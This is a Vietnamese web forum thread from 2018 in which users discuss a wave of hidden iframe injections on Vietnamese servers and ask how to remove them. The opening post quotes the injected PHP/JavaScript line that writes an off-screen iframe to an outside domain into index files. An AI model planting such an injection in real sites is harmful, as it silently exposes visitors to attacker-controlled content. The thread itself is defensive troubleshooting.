10/10/2018, 09:49

[iframe] tấn công hàng loạt sever Việt Nam

Tình hình hiện tại theo như em biết và xảy ra trong suốt thời gian vừa qua rất nhiều server việt nam bị dính iframe của bọn tàu ( theo suy đoán của em là vậy)

Nên em mạo muội lập topic này để anh em chia sẻ kinh nghiệm diệt các loại iframe này.

Tự động chèn vào các file như sau index.php, index.html và default.php

echo "<script>document.write('<iframe src="http://hulmeux.com/?click=842481" width=100 height=100 style="position:absolute;top:-10000;left:-10000;"></iframe>');</script>";

Nếu xóa thủ công thì không ổn, mà tìm ra nguồn gốc của nó thì càng vật vả.

Anh em có phần mềm vào tools nào hay giới thiệu ạ.

natostr viết 11:55 ngày 10/10/2018

Con này có từ lâu lắm rồi bạn àh, hầu hết các chương trình antivirus đều có thể diệt được. Bạn cho 1 chương trình antivirus nhận diện 1 con đi xem tên của nó là gì (nhớ là chỉ nhận diện chứ ko diệt nhé). Sau đó search trên mạng tìm 1 cái tool chuyên trị con virus này về scan toàn bộ máy.

Scripted viết 11:51 ngày 10/10/2018

Ba.n có thể thêm 2 lệnh

echo "";

có thể nó sẽ comment out cái vụ auto iframe này

pcdinh viết 11:54 ngày 10/10/2018

Loại virus ARP thôi mà. Nó nhiễm vào một máy tính trong LAN, bị giả làm gateway

s.code viết 11:51 ngày 10/10/2018

Bác pcdinh nhầm rồi. Dạo trước cty tôi bị có loại site của khách hàng bị tấn công kiểu này.

Nó hack upload backdoor vào change các file index. Toàn site của bọn tàu và Nga ko à.

noactive viết 11:53 ngày 10/10/2018

Con này đúng là vô đối. Nó nhiễm lên server rồi nhiễm xuống máy. Không tài nào em diệt được.

Bình luận về bài viết này

Chia sẻ tin đăng đến bạn bè

Gửi Messenger

Bài liên quan

tranhuuthocr

0 chủ đề

0 bài viết

Tác giả nổi bật